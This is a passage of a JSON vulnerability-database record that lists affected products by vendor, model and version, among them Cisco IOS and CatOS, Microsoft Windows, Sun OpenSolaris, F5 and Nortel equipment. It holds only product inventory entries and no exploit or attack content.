            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2see",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "interactive response",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.3.7"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 48",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.2(1)"
          },
          {
            "_id": null,
            "model": "ios 12.2 sb1b",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1db",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server web edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(8)"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(20)"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "_id": null,
            "model": "windows professional sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "rt107e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(12)"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.2ira",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 94",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "windows advanced server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.3yq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "ios 12.4 xg4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.2.6.1"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "ios 12.3za",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista business",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2dx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "networks secure network access identity engine ignition analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "networks switched firewall sf-5114",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.3(4)"
          },
          {
            "_id": null,
            "model": "ios 12.4 jl1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 sga9",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 50",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0sp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "email and web security appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "ios 12.2zd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "srt100",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.4 xd12",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ex",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server for x64-based systems",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20080"
          },
          {
            "_id": null,
            "model": "ios 12.2 srd1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "netscaler access gateway enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "netscaler build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "8.047.8"
          },
          {
            "_id": null,
            "model": "ios 12.4xp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3yi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center administration ccma",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "ios 12.4xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt103i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows server itanium sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "5.0.3"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(1)"
          },
          {
            "_id": null,
            "model": "windows xp home sp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service media processing server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.0xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista enterprise sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2bw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.1(2)"
          },
          {
            "_id": null,
            "model": "ios 12.2xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server datacenter edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "bigip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "ios 12.2ye",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4550t-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 01",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rt80i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 92",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xnc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3va",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks secure network access switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-40500"
          },
          {
            "_id": null,
            "model": "ios 12.2xnd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 xl4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 83",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 106",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 ja",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista ultimate 64-bit edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4526t-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "ios 12.2xs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 125",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sbc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.6.1"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(4)"
          },
          {
            "_id": null,
            "model": "ios 12.2yv",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "networks self service cdd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "ios 12.1ga",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 2550t-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2500"
          },
          {
            "_id": null,
            "model": "rt100i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2xw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4(3)"
          },
          {
            "_id": null,
            "model": "bigip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "ios 12.4xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service ccxml",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "coat systems director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "5.2.2.5"
          },
          {
            "_id": null,
            "model": "ios 12.0xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sed",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks secure network access identity engine ignition posture",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "ios 12.2sm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4md",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 1005r",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "networks self-service peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 76",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "x64"
          },
          {
            "_id": null,
            "model": "ios 12.2xna",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 power/utm r60 hfa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "07"
          },
          {
            "_id": null,
            "model": "ios 12.1eb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "netscaler build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.196.4"
          },
          {
            "_id": null,
            "model": "point vpn-1 power vsx ngx r65",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 101a",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3bw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 111a",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2.11"
          },
          {
            "_id": null,
            "model": "ios 12.3yf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 87",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "windows vista home premium sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3yz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3yg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 t6a",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ewa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional sp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2za",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point software connectra r62 cm hfa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "01"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.2.8"
          },
          {
            "_id": null,
            "model": "ios 12.3xz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home premium 64-bit edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.3xs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 mda",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ssl vpn engine",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "networks self-service peri ctx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.2(1)"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.5.2"
          },
          {
            "_id": null,
            "model": "ios 12.2ja",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "9"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 113",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4ja",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point software connectra r66.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center manager server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 5650td-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "ios 12.4 yb",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 57",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium sp1 beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20031"
          },
          {
            "_id": null,
            "model": "netscaler",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "ios 12.4xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1e",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4gc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "ios 12.1yi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.2.8.7"
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4526gtx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "rta50i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 119",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.5"
          },
          {
            "_id": null,
            "model": "ios 12.4xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1az",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "ios 12.2da",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1 ea13",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home basic 64-bit edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(5.3)"
          },
          {
            "_id": null,
            "model": "ios 12.2xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 power/utm r70.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point vpn-1 power vsx vsx-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "0"
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "coat systems proxysg 200-c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bigip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "bigip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "ios 12.2yu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "16.1"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 110",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.6"
          },
          {
            "_id": null,
            "model": "ios 12.2sga",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(15)"
          },
          {
            "_id": null,
            "model": "windows datacenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "rt60w",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.1dc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server for itanium-based systems sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2008"
          },
          {
            "_id": null,
            "model": "networks switched firewall sfa-6600",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "interactive response",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ios 12.0sl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
